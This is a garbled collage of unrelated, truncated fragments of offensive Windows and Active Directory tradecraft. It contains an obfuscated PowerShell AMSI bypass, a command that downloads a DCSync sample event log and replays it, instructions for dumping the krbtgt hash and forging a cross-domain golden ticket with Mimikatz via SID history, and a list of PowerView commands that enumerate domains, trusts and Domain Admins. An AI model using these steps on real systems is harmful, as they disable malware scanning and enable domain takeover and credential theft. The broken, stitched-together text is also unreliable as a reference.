sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','
https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/raw/master/Credential%20Access/CA_DCSync_4662.evtx -OutFile C:\Users\sylvain.COSMOS\Desktop\CA_DCSync_4662.evtx Get-WinEvent -Path C:\Users\sylvain.COSMOS\Desktop\CA_DCSync_4662.evtx | ForEach-Object {$_ | Write-EventLogRecord -Channel 0...
From the DC, dump the krbtgt hash using DCSync or LSADump. Then, using this hash, forge a cross-domain TGT with Mimikatz, just as in the previous method. This requires the current domain's SID as the /sid parameter and the target domain's SID as part of the /sids parameter. You can use PowerView's Get-DomainSID, and use the SID history (/SID) of *-516 and S-1-5-9 respectively to impersonate the domain controllers...
PowerShell Empire is a post-exploitation framework for computers and servers running Microsoft Windows, Windows Server operating systems, or both. In these...
Get-NetComputer
# Get all domains in current forest
Get-NetForestDomain
# Get domain/forest trusts
Get-NetDomainTrust
Get-NetForestTrust
# Get information for the DA group
Get-NetGroup -GroupName "Domain Admins"
# Find members of the DA group
...